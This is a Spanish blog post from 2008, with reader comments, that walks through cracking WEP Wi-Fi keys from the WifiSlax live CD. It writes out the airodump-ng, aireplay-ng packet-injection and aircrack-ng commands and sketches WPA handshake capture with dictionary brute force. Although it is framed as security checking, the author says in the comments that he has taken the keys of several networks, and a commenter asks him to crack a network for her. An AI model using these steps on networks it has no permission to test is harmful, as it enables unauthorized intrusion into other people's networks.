jump to navigation

Hacking redes wifi para usuarios Windows 29 agosto, 2008

Posted by ubanov in Informática-Linux.
Tags: , , , ,
trackback

Me temo que todavía no conozco ningún tipo de solución para hackear redes bajo windows… ¿entonces cual es la solución que hay para que un usuario que sólo tiene windows en su equipo pueda comprobar la seguridad de una red wifi?

La forma sencilla de poder hacerlo es usar una distribución Linux Live (que no necesite la instalación en un equipo) especializada en seguridad wifi. Una distribución que se puede utilizar de forma muy sencilla es WifiSlax (www.wifislax.com). Desde la página web se puede descargar una imagen de CD en formato ISO (actualmente está la versión 3.1, que ocupa 683MB). Lo único malo es que en equipos muy nuevos puede ser que no funcione.

Si no tienes Windows, pero no tienes configurado todo el entorno del airo*, también puedes emplear este método ;-P

De forma resumida los pasos necesarios ara crackear una red WEP son los siguientes:

  1. Arrancar el sistema desde el CD de Wifislax
  2. Validarse como usuario root y password toor
  3. Arrancar el entorno gráfico (startx)
  4. Cargar módulo de inyección de paquetes. Desde el entorno grafico menu de inicio/wifislax/Asistencia chipset/Asistencia intel Pro Wireless/Recargar modulo ipw2200 (este es el que utilizo, dependiendo de vuestra tarjeta wifi puede ser otro). Este módulo vale para las Intel 2200 y 2915 (que yo sepa).
  5. Verificar con ifconfig que se haya creado el interface nuevo (suele ser rtap0)
  6. Ponernos a sniffar: airodump-ng -w /tmp/ficherocaptura rtap0
  7. Con “iwlist scan”, o en la salida del airodump-ng, podremos ver los datos de la red. Nos interesa apuntar el nombre del SSID, el CANAL y la MAC
  8. Configurar la red wifi (aunque como no sabemos la clave pondremos cualquiera): iwconfig wlan0 essid “SSID_DE_LA_RED” channel CANAL_DE_LA_RED key 1234567890 (wlan0 es en mi equipo, en el vuestro podría ser otro, es el interface que se crea con la tarjeta wifi).
  9. Empezar a inyectar paquetes: aireplay-ng -3 -x 1024 -b MAC_DE_LA_RED -h MAC_NUESTRA -i rtap0 wlan0
  10. Si la red tiene algo de tráfico empezarán a subir el número de ARP requests, cuando tengamos unos 30000 podemos  pasar al siguiente paso
  11. aircrack-ng -z /tmp/ficherocaptura-01.cap
  12. Si todo va bien nos dara la clave😀

Para crackear una red WPA es más sencillo los pasos a ejecutar y se necesitan menos paquetes (sólo se necesita un paquete de handshake, que lo puede capturar directamente el airodump), pero el descubrir la clave es por métodos de fuerza bruta (palabras que se encuentren en diccionarios son fáciles de sacar, otras más complicadas no).

Comentarios»

1. Linux-OS » Hacking redes wifi con WiFiSlax - 29 diciembre, 2008
2. jorge - 29 enero, 2009

el 8. podrias esxplicarlo mejor?? o yo soy el bruto!😛

3. jorge - 29 enero, 2009

puedo dejarlo en modo test el wifislax? esque no quiero instalar todavia ni particionar mi notebook

4. ubanov - 29 enero, 2009

Hola Jorge,

Para el punto 8 lo único que tienes que hacer es mirar el SSID (el nombre con el que aparece) de la red que quieres crackear y el número de canal en el que está. Para obtener ambos datos lo haces con el punto 7, es decir ejecutando “iwlist scan” (esto te muestra todas las redes que tienes alrededor, con su SSID, con el canal donde están…). Después sólo hay que ejecutar el iwconfig que pone en el punto 8 (cambiando el SSID y el canal, evidéntemente).

Yo lo he he explicado con cuatro notas que me valen para mi y quizás para alguien que sepa linux… en inglés se que existen guías más detalladas que te explican paso a paso cómo hacerlo.

Wifislax es una live, con lo que puede ejecutarse perfectamente sin instalar nada en tu portatil (es más yo nunca lo he instalado en ningún portatil y he probado a sacar las claves web de varias redes wifi, y siempre me ha funcionado, salvo en la red de mi hermano😦

Un saludo.

ana - 11 febrero, 2011

hola,gracias por todo pero a mi me sirve de poco(soy muy torpe)me `podrias ayudar??
soy bastante torpe en estas cosas!me harias un gran favor…..
si te doy el nombre de la SSID,EL CANAL Y LA MAC me lo podrías sacar tú?gracias

sarra - 13 noviembre, 2013

definitivamente no , la tienes que sacar por tu propia cuenta…^^


Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: